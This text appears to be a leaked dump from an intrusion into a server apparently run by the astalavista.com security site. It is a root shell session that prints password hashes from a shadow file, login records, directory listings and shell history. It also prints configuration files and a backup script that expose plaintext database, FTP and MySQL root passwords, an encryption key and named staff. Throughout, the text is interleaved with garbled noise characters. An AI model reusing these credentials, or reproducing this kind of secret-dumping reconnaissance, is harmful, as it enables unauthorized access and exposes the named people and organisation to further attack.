+ b; \; h# {" K: L; _: A, w/ Kadmin 1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::- ]3 O0 ` s1 r" _
jon 1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
4 ]3 \ g" f# S5 t! G6 }com 1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::! t8 |4 J% f- q$ \9 P
astanet 1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::0 Q/ W- _3 ~$ N3 J" a; I; m* v
4 C0 o) p! Y) ], E: u6 f6 ]sh-3.2# cat /etc/motd6 @4 C! m0 l `/ d
#####################################################: u5 K7 Q# b% t) }! u# H; _/ r( G
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
& y/ {9 ]6 Q3 o# |__| [__ | |__| | |__| | | | [__ | |__| #: v% k% d& c' j; e* ^
# | | ___] | | | |___ | | \/ | ___] | | | #
1 U- ?( J' B8 N/ w# #2 h7 a* C# D, ]
#####################################################
- X+ e0 l! [# \' Y9 P+ s# #
, b) k+ j$ y5 Q/ V; b o' u: F/ F# Admin Contact - 链接标记support@secureservertech.com #$ S9 w1 @% T% E! o9 [9 N
# #( u5 v9 }" T0 R* p
# Available ShortCuts #
# L+ i, \& {- a; F1 L q, v1 Q x# #
. h) D- F. O7 e, J% P# nst - list active connections #
; g9 d" k6 e0 q- v+ z& n2 W+ ~# ddos - shows how many times each ip is connected #
8 z3 J. D; E% B3 M; Y# ltr - restart the webserver #4 r% R, S0 g& }6 v9 t
# phpc - edit the php config file # F: O8 k3 R# f3 l+ }- P* Y
# htc - edit the webserver configuration file #6 O' @5 n$ U$ x0 N
# up - uptime #1 T, N& C6 N" i7 Z% S0 c
# etd - edit the motd of the day file #$ ^# ` w; I4 j* K% v( r
# htr - start and restart apache if needed #5 s! w+ U n- h1 ?8 \# V; `& b8 Q, c
# syng - shows active SYN_RECV connections #6 V" R* b1 V3 i3 T5 a8 Q s9 l
# synd - syn flood blocker - “synd -h” for usage #
/ E g, w7 W% n/ p+ `#####################################################
% C) o; ~( ~9 ]& W$ r( _# NOTES: #- T: R$ y" l3 }( @# f- j+ w, v
# Last Upgrade - 12-08-2008 by JF #
p( x" i3 k' j) W( f2 S# My.cnf/Mysql Optimization - 1-28-09 #8 @+ r% O* E6 ?! w: I- `, y
# #
* Z0 N9 Z6 C+ D2 e# d8 A9 _# #
) h" O+ F8 a. _" h# #
+ z A* c7 T# S#####################################################& ^. P, Q8 I B/ y: D4 R& P: N
+ T2 V r" ]/ w9 N W( A5 }
sh-3.2# lastlog | grep -v Never8 U# V {+ z. Y+ y+ Z c, k, J& Q* W; ~
Username Port From Latest
1 s4 j1 G1 E. p& q7 m2 Froot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 20098 c! H1 f4 ^- c! e$ w
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
3 ?( {1 q) y% ?7 fcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20098 D* A: E* u3 K. W- ]* m
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009- B6 N, `; S$ n$ r9 P& l
8 s2 z. Z/ f& v* }' Ush-3.2# ls -la
; D- f5 J; M4 S* utotal 453376
! |: l7 C& V/ j+ Hdrwxr-x— 15 root root 4096 Jun 4 08:40 .
4 h; f$ G% d9 C' _6 J' Ydrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
! G" F! H# B. ~3 a2 m-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip' w! Q8 G2 X. T8 @" O& k
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
5 Y# ^8 O% F! l& F; ?% s-rw——- 1 root root 16836 Jun 4 07:21 .bash_history8 N0 i \- C! r# R F+ N
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
2 I; T' i/ K# m( A-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
$ \, ~# C& a/ u4 _7 ]-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
9 ~5 f, w) P* }7 l# O! D6 f-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
: L, T( P9 D' ?' J8 {* Q9 i-rw-r–r– 1 root root 1327 Nov 29 2007 cert
, D. o( ?& }* ?( ^7 H M2 p-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql4 ~' q' X) {$ R/ @+ I
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
: T: n' @* @0 T, O6 l+ j# h$ i-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc! n% i. q$ n( _
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql2 S4 B' u9 W/ M$ v
drwx—— 2 root root 4096 Oct 28 2007 .elinks- w9 G3 v: J- ^9 a% R
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1. R+ F% @ h' R# z- X; B. L
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
: [5 F& s; r8 T) X/ w- J# j& H8 V-rw——- 1 root root 0 Apr 16 13:19 .history I/ c4 }2 }% b
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log6 b' Y2 ^( j- U8 ?# e
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
' S. o% ~" t7 c0 K) l6 ?-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh4 S* S+ R9 i+ d9 S- P6 P
-rw——- 1 root root 35 Jun 2 14:23 .lesshst1 u' k" z1 M' z" z1 f
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
# o: O! S) D+ C" `drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
" n% A7 Y0 d- o8 e5 ^! K-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
- B2 i. E- M9 {) Z5 |( v4 m-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz21 p2 ~: ]5 _0 i" J. R+ r
-rwx—— 1 root root 760 Sep 18 2008 lp- s/ a5 v, l1 m' y b. ?% R
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.18 X2 j9 C, ~' i" Y
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz, H( L8 n6 h. l" K
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1; { R6 o1 M" ]% L% O5 J. c6 ^
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.92 F: _6 Q8 {7 T' ^
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz- s0 U$ s" F4 {5 G$ C
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
' l& f/ u3 n& r& K+ D-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz# ]8 d ]3 f0 I1 |+ N
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
9 c+ Y; Z; ]2 \3 }/ S# V4 X1 q/ P-rw——- 1 root root 41 Oct 19 2007 .my.cnf. I/ ~7 x0 T. g7 n
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history" X+ Z h+ d3 D7 v
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
u' X8 L3 e1 _# `-rw——- 1 root root 41 May 20 2008 .mytop
$ b& D: Y6 ?7 a% }% K9 {drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.68 F3 F% I3 B7 a2 n( D
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz' x2 L7 a2 E7 u R) e% Y
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp: ^% T3 _" Y) ]( P7 V
-rw——- 1 root root 1462 Sep 21 2007 opt.php1 \7 V- C& g7 ]" e! C% K
-rw-r–r– 1 root root 3371 Sep 22 2007 p
~( ?8 f2 T, t- e6 w+ p1 {$ G-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
0 [, ?9 P* d7 }2 t-rw——- 1 root root 1024 Feb 3 21:32 .rnd
0 c+ |2 w* N3 Y H-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
8 d1 ?8 F B) z% L-rw-r–r– 1 root root 887 Nov 28 2007 server.key+ v8 t7 J9 f3 q% {4 H* s' I2 I
drwx—— 2 root root 4096 Oct 10 2008 .ssh
1 x0 s$ X$ ^# q) G-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
, ]( T( x, X# {-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc* `/ W9 Z6 B, ^
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
- l, g& T+ P+ e3 h' r& y- |9 y-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1" D. A$ v2 |, P- W
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp$ i# Y" @) r2 d3 C b
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
: U4 X- Q" e( G' Ddrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0, A. I* H x+ g Q: H9 W0 T
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
. a! a5 z: E3 S6 L2 [, E$ ?! _-rw——- 1 root root 12997 May 16 2008 .viminfo! i2 p5 b9 k+ B9 Y( _- h
" _. W0 A' G' X3 L' l0 D2 d1 ash-3.2# cat .bash_history
3 z, t! t, q! [[snip]/ F. \! Y, y, o
wget cp4sst.com/sstlinux.tar.gz0 d/ m8 |; `7 M& ?
tar zxvf sstlinux.tar.gz2 D d- o. Z$ {
cd linux-2.6.27.10- B, A/ A. v" K1 a; B8 D2 f
sh install.sh0 _" ~& v) z7 y+ B
make bzImage ; make modules ; make modules_install ; make install
$ G/ f0 b& ^3 i2 Y, Dmake clean
$ W. r; S+ ~% `; g' D4 Iservice mysqld restart, N; u0 J7 H, {6 N, s/ @' Y3 x
[snip]! W, Y. \2 X1 v$ m, }7 W
cd /usr/sbin/8 e( t, L( y T7 I' O' p
chmod 4777 traceroute% ~! W0 V1 ^1 I; ^. j* b, C% n
chmod 4777 ping
8 R" u% A/ u( [ Y5 ~3 Ttraceroute -I 链接标记[url]www.astalavista.ch[/url]) ~( O9 a* {$ O$ [ J" ^' `; z
[snip]
3 a9 t1 b" P: C, Cvi /etc/csf/csf.conf3 \( s4 Z" ~7 K! c
traceroute google.ch
; B% T; @' k' H) `% z+ _service csf restart
, F+ o% B" O* V/ k( T' s% | h/ Ztracert google.ch! c9 Z$ B" E4 m8 }( ^. @
service csf restart
* K3 Q! I% T1 |( Z# ltraceroute 链接标记[url]www.google.ch[/url]
, p, K0 _1 e) q- l* E9 ?. T8 V5 atracert 链接标记[url]www.google.ch[/url]% B% G0 B5 {( T
traceroute 链接标记[url]www.google.ch[/url]& Z3 O" _+ P; ]( N0 N) U
locate traceroute
8 ^: s; V4 d2 e6 Xchown 4755 /bin/traceroute2 J" L0 O/ z* T4 z7 q
chown 4777 /bin/traceroute
- U# Z5 D( h8 I0 P4 ?9 ^locate ping$ j @) i( w, H% c( _
chown 4755 /bin/ping9 t4 f3 s* B% \9 a/ G0 W1 N
chown 4777 /bin/ping" N; Y9 }3 d S1 V' A0 c2 H0 }& y
cd /bin/$ C7 q. B$ _8 L/ D1 |/ H" F
ls -ali | grep ping w0 C3 S3 T: F( R% p% D
chown root ping
4 V+ R' h2 ^0 I0 P; {( F! Xchmod 4755 ping
) z% j* c/ P, X) h, rls -ali | grep traceroute
' ]/ t) V# q% [1 o$ xchown root traceroute" ^" `9 d# U$ V; B/ k
chmod 4755 traceroute
4 X, |" j: a. P( R. xls -ali | grep traceroute2 `0 [$ L5 S6 }, Q
traceroute -I 链接标记[url]www.google.ch[/url]7 Q; V# D* } r( R, C9 ^1 ^& f
traceroute 链接标记[url]www.google.ch[/url]( _! R0 o& i" y1 q) U
whois pmsantos.ch( `6 V( o1 m$ p" R! D3 L; F
[snip]
' g* R! g( k: W) V) Fmysql -h com_contrexx2_live < /root/defaultp_ports.sql
. x# J% c9 {. }/ S% d; dmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
w% P, _& {: e2 R0 m* U' h+ U0 kmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql8 e! c; f- l, A* x; M! _8 N
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
; _3 }; S- ?) h6 P4 j' d+ ltop5 F( f ? u% m- D) j2 k
ping ssth.ch- D: G. K) k0 v5 _3 f' D- r
ping asdlkfaljgasd???ljg???lasj.ch/ k, K m/ q5 V" A+ o
ping asdlkfaljgasdlasj.ch- ~5 \* X2 t4 @+ L( j% ~2 G- M" i
ping 链接标记[url]www.ssth.ch[/url]' b4 @) J) C& ]& l! e Q
ping ssth.ch" R7 E) t- z6 a7 g3 \1 B& m' r
nslookup 链接标记[url]www.google.ch[/url]' i- s8 }, C1 l6 k+ l
nslookup 链接标记[url]www.ssth.ch[/url]5 L' d/ z8 m4 j
man nslookup
1 _6 {% _8 q) Rping 链接标记[url]www.google.ch[/url]
o* b3 _( K$ C1 I8 E0 k1 unslookup 链接标记[url]www.google.ch[/url]
' T& y5 Q" d# w, k0 Fnslookup 链接标记[url]www.google.ch[/url]- }2 I9 ?% \% {1 {" d( q( n
nslookup salfjasdlf.ch1 ?: w* x( B! s6 x2 X
[snip]
1 q+ G7 s3 b7 _5 J' r6 Z' m9 vopenssl passwd -1 sadf
! D9 N k) v7 T. Sopenssl passwd -1 5cZNHstdTy$ `- {3 x5 _ @4 ?, e1 J
mysql7 F5 N* l* W# P& |
mysql
# {. l5 Y4 k" r' M. E- E3 a6 i/ jlocate proftp
, J z5 L+ c& @$ N4 T4 cvi /etc/proftpd.passwd
! z9 ~3 P$ D7 b, lservice proftpd restart
/ I9 A W+ z. H1 s6 B# I5 U6 F, {+ vlocate proftpd.conf
9 A& `9 m$ K2 t9 ]. m* F7 j Lvi /etc/proftpd.conf
, x' |3 l* ?" M. J. k1 k+ Vvi /etc/proftpd.passwd
; R. U/ U& S: Sservice proftpd restart1 X- O# C7 v: f0 n5 U
[snip]! T9 i! v" _- G4 q7 ^, x0 G" p$ z
/bin/sh /home/com/backup_system/backup.sh
) w! m! a- ^3 e! o% Q6 W# b/ wtar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin& K! V. p* k0 B% V" ?# e
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
7 l! b3 T* \9 W6 ~% K# j! t% ^mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
# I8 L7 T9 B# y& F# vls -ali
2 a4 g% ~4 w0 L j! V! tmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql X- U" B& a: y; L- Q1 J) e
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql3 ?5 p& d/ |: S" T: u6 G% e6 Z
crontab -l
O8 R9 J" x$ j) v: m: N/ `crontab -l v/ W. z5 m; B1 o8 c3 c
php -q /home/com/public_html/modifications/cronjobs/securitynews.php& f; C# b4 d2 z" D0 f' |; ?" ^* S
/home/com/public_html/modifications/cronjobs/exploits.sh
) f7 a {% E, b: r1 T3 Gwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]/ D8 e: a, U( Q h/ n
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
0 p( W. i7 v, I' I- R& Mcd lsws-4.0.30 G `4 X( r$ B8 j e" y
sh install.sh
( t% I5 {" O* m0 vuptime0 O) L5 \4 A. W
hdparm -tt /dev/sda
% d- [$ y$ a! ]2 L9 K7 v4 N- }iostat3 [/ I" a2 S( \
yum install iostat$ z. g% L( S0 k. \
iostat+ Z9 n! G4 g8 w% w
whereis iostat: F) V! ~" ^' f* u, Z
yjm clean all
, m! g3 g8 t/ B9 @' Vyum clean all ; yum -y update) I0 q7 [% }2 I2 f8 O; D
iostat
4 b& ]6 y* m7 `' I% `yum install systat. H% R2 y; R: K3 v7 z* w
rpm -qa | grep iostat
: ^ p( v" i0 Hrpm -qa | grep sysstat5 N& k7 f1 T% C3 l1 I' e% Y# }. H
rpm -qa | grep systat
' M2 x+ F7 `9 T$ V* Q: tdmesg -c
+ [* s) i. q% D2 I- t$ Ksysctl -p9 f1 p2 J3 p [- N2 s
uname -r
5 {* K, G2 t! D" F. F1 ucd /usr/src4 `" \& L% w7 \4 e! [
wget nix101.com/kernels/sstlinux.tar.gz6 j6 ]( v) e4 N2 ?/ t
shutdown -r now9 Q2 N. Z6 X( M7 O, t' _0 c
nano -w /boot/grub/grub.conf& i. H* p( ^% V( o
2 k& h6 u. p( f2 ~% g7 k: m- C* C
sh-3.2# cat .my.cnf
+ Y7 K* G3 H; R% W0 A1 n[client]) U7 h V' M8 n" c T
user=da_admin$ |* \! D. p3 i2 ~7 n' _/ K
password=X9dctmRH
( u* F! V9 ]' p* `6 z/ k0 x$ A* E% }9 z! L
sh-3.2# cat /home/com/backup_system/backup.sh
C( a( _3 A2 `2 Q#!/bin/sh+ V8 d/ S1 U6 ~1 e# n4 h2 l# U3 [
#####################################################################
1 R* y) c1 w+ S/ Q. Y# #- y! j+ G% \0 C
# incremental backup for astalavista.com #
: f, }9 ]6 r4 h, Q1 w6 |# #' g3 n6 Z) ^& e2 n" n w
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #' }; `8 H# y4 Q9 E5 {
# #
# e5 Y/ j& g/ X) @ k& e8 I#####################################################################
: ]* t6 h/ m5 Y$ z[snip]7 A( R- [" ~- d( n
PROG_DIR=”/home/com/backup_system”;8 n2 |& ~: E8 _+ e' _7 g
BACKUP_DIR=”/home/com/backups”;) M' G$ r/ J5 |
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
. o- U% E' l2 K- y+ c E# ftp for synology backup server
( S6 ^% E. L; Z) OFTP_HOST=”212.254.194.163″;$ }* K; w8 r6 F8 p# b
FTP_PORT=”21″;# g8 n6 N0 w6 _) W8 U
FTP_USER=”astalavista.com”;
4 r# b$ g4 ~8 x+ zFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
1 \- O" H( R* [- u8 ]FTP_DIR=”/astalavista.com”;; a& }$ Q; U2 |! } s7 Y) U& L
# database
- m) _) {( V8 {# J0 ~DB_HOST=”localhost”;
+ o" q9 m' c+ P; iDB_USER=”contrexxuser2″;! @0 V. R9 L! A7 Z5 \
DB_PASS=”0fEYNZgXz1pKe”;7 {0 E0 k. p/ f! x, w1 }
DB_DATABASE1=”com_contrexx2_live”;
& ^6 A. e2 Q" e: pDB_DATABASE2=”com_contrexx2″;
) N* ?+ R4 e0 O1 X[snip]6 J& z8 ?2 K+ m/ i8 w8 A" d
ftp -in $FTP_HOST $FTP_PORT <<EOF* S# k( N, [! ~) M2 |3 X4 e
quote USER $FTP_USER8 N6 h5 w2 D. G8 N
quote PASS $FTP_PASS
9 v( p; u& s* n& Z" v; P# Zcd $FTP_DIR" g: A5 D3 q8 A' `
put $DB_FULLNAME-SQL_Dump.tar* Q6 I6 b( v$ i" O* Z# m
put $BACKUP_FULLNAME-Public_HTML.tar
$ x7 A6 M" a$ h7 J2 `0 U3 yclose0 V" U% R& f: Z3 n4 `
bye
2 { w$ y5 J3 l( [9 C: wEOF
( H- }3 \4 Z5 B/ y! W
: m: _: x9 K% E1 tsh-3.2# cd /home+ ?6 r. B2 N- s! O4 j
sh-3.2# ls -la8 |! M1 T% B% i6 `+ f
total 120
% z* _; T" I: Udrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
5 H% Q/ M( n& S+ I- ?. j5 p# R# qdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .., x$ Z& \% C4 o+ ^% c( n7 p
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin4 q$ ?# l" M1 E# S
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
6 \9 x; V2 H7 Q) p-rw——- 1 root root 8192 Jun 3 02:45 aquota.user; d; A+ J+ e7 Y, I. [3 H6 u3 h
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
# Q1 \ t; [4 D% ?2 Jdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup' j! |+ x0 W" x5 k5 \* p# g; M
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161' ~+ O& q5 ]* c/ Y6 m- R
drwx–x–x 10 com com 4096 Apr 28 12:40 com
6 i+ E1 r% T' ]$ M! O# [' Hdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
. V; Z, i3 a3 Qdrwx—— 3 jon jon 4096 Sep 21 2007 jon
C+ p. Q3 Y0 } r3 ?+ o* ^/ Vdrwx—— 2 root root 16384 Sep 11 2007 lost+found1 G* e' I8 P' Y; s: [; C6 P. {
drwxr-xr-x 2 root root 4096 Sep 14 2007 my8 y P" l4 R! \& U2 Q/ Y
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
" v/ D8 Q" `* r/ g4 {' d' A/ _" Jdrwx—— 2 jon jon 4096 Sep 15 2007 test
$ J5 t( C; k6 w: wdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp; I* v+ ^6 _9 A2 C* _
# Q$ f, L3 {* M: X9 s j
sh-3.2# cd admin, f( i# X2 V3 i
sh-3.2# ls -la
5 W; R1 Z3 E, k0 A( {total 1735896& m3 f- O2 g1 \" O1 y0 K
drwx–x–x 9 admin admin 4096 Nov 28 2007 . ]. c q% R) Z4 q: M+ J8 Z# {
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- x( E7 W" W0 Q# G" ]drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups7 x# Z2 u- \/ C6 |; M; F
drwx—— 2 admin admin 4096 Sep 28 2007 backups3 z8 f( O$ k& H `: o) y
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history. O* R0 X, e* d# @4 }2 j, Y
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
2 o% s$ B3 T/ E( w( F-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile2 t* J. g; M, d0 T+ I- u
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
" @* K( y5 O5 |) m) Sdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
9 F. P( [/ C! ?4 K0 @+ X9 S! D/ wdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains2 m$ D/ t% T6 o' i! a3 E- Q4 r2 f
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
: [( j0 D5 m1 H0 d% T-rw-r–r– 1 root root 24 Sep 21 2007 info.php# q, k' A/ L) Y# U( \. n
drwx—— 2 admin admin 4096 Sep 21 2007 mail
: \/ W# q: h: z( u7 g( _1 O-rw-r–r– 1 root root 716 Nov 28 2007 server.csr' p; w/ q: w4 Y8 }. n5 }# s
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
3 W d2 ~5 Y1 ^" j0 K-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow6 ^+ m E. U+ Y
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
( d- b3 @& ]4 L1 Cdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
3 A( U5 U; _4 U) A! L( q$ @
+ L8 U- v! @- g4 y% O9 Osh-3.2# ..
; ^' _6 S6 s0 d9 |# w, R8 z+ gsh-3.2# cd jon
/ ~) r1 B5 W; A) y$ jsh-3.2# ls -la
* @. D1 @( k4 @! Gtotal 36
% v9 v; B; q s) |drwx—— 3 jon jon 4096 Sep 21 2007 .
5 w x# @5 I5 N$ x+ ]0 G5 V2 bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ y% X% J: X2 S
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history8 b7 {8 d' R0 C" ^4 _- _
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout% L) {' F( @6 W1 U) }" R2 W) X
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile7 {$ v+ r) w9 \
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc8 i6 i, o& h X) ]
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
, R5 y. j) t0 b/ vdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html, O. g; i+ C) ~# _) {1 Q! y j
" k5 P' k& ] d3 Q4 zsh-3.2# cd ..
" e( E" T* x6 _8 T1 `sh-3.2# cd test5 \1 ~) L5 b, x. R
sh-3.2# ls -la
1 \7 p5 K% S% X9 W( {, ?8 y; _total 48
i% U9 m& e- m% Edrwx—— 2 jon jon 4096 Sep 15 2007 .! l w- z5 l1 F; g- x
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..) Q& j0 D% ^% c) X Z G+ o$ D) |
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history/ x" R* `3 l3 X1 \ U. T
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
7 {8 n" F6 M7 `" n. z2 p; ]-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile# c6 f5 y- }! Q; z4 |( ?6 ?; b1 U
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
9 U4 Z o( `& k2 y5 d% t, @sh-3.2# cat .bash_history
1 ~7 H) ?% W' H. ]& j/usr/bin/mysqladmin -u root password PoliuJhytg67
8 {& i4 `0 g7 }( C: t3 ^ k/ W0 ^7 v1 l
sh-3.2# cd ..
8 A. W! D( ]1 Q2 a; hsh-3.2# cd astanet) T( p, l7 |) {$ |
sh-3.2# ls -la
! z4 P+ n: }! G- {7 [! I, t$ ?, Xtotal 52
' j G! P9 H4 b U2 _( Y( ?drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .) n" O' Y# v5 R5 r# I% Y: g) ~) n9 D
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
# n. o- r4 K! y/ p' bdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
; W- @- Y! S& c* r- V-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
) u: `( L1 z5 W L% q, K! E-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout! l, N8 i* N& I/ q" d: e
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
) T7 A {$ ]) k1 Q$ _' f f-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
# y* \5 J1 j( E. \/ udrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
2 T' ]" F( d b4 x0 Idrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap. c9 u$ u/ V2 G0 ?" H& X+ D
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail- V( y7 s' C- E
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history1 |( G: _& F/ D! k
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
8 c" i! E5 y' q7 a# X, A' C-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow4 G4 p+ E, S# ~. d; Z! y$ h' P
( }# I2 H0 L3 W7 l
sh-3.2# cd auth/: U# v1 }$ c( j' J
sh-3.2# ls -la+ Q9 E9 K7 ^# Q1 \. j
total 28 T( E! c5 S" d
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .) b2 e( b1 ^7 s+ G! o8 B6 ~
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
: c9 \5 K- [' Q9 @% d v$ [% I; d-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
2 c8 h% I6 h# P( w+ ~. o-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
; u6 O: F8 @( V% F9 J-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
2 ~- d1 ~6 ? x! J, g. h-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
. R! x9 D) k T! t0 a& z0 q' P-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
8 |5 m) N( J( r/ e( ~. ~. m8 @$ |" v
sh-3.2# cat hackercontest.config.inc.php" q# ^. J m; k( m0 `2 [
<?PHP
- B% w* u8 _+ ]/ y$ f- A; J// Variabeln f?r Verbindung zur Datenbank //, Z$ ~9 K/ X9 {7 }3 j- G
$conxHost = ‘localhost’; // MySQL hostname/ Y$ P6 ~9 H" r& h1 Q9 ]0 [3 ~
$conxUser = ‘hackercontest’; // MySQL user! X6 P& m# w8 x, A4 c9 k- k
$conxPassword = ‘K6m@7dUc’; // MySQL password
( L6 u. _. }4 Z2 t \- k9 R, h, l# R$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
8 q3 W- q$ s! g3 v% q5 g2 C6 m, ?! n6 s?>
- t5 `2 L3 _0 G( U' Osh-3.2# cat hosting.config.inc.php' D- }' W4 v+ p4 G4 p" s% c
<?PHP
2 K4 Y! A; W& a5 v. G3 j* p// Variabeln f?r Verbindung zur Datenbank //! s) \/ H9 L/ l! U$ ]
$conxHost = ‘localhost’; // MySQL hostname
2 |* w( ?, v1 @( [, i; c$conxUser = ‘hostinguser’; // MySQL user, c, g- {2 A' Z7 J
$conxPassword = ‘cXvB3981′; // MySQL password
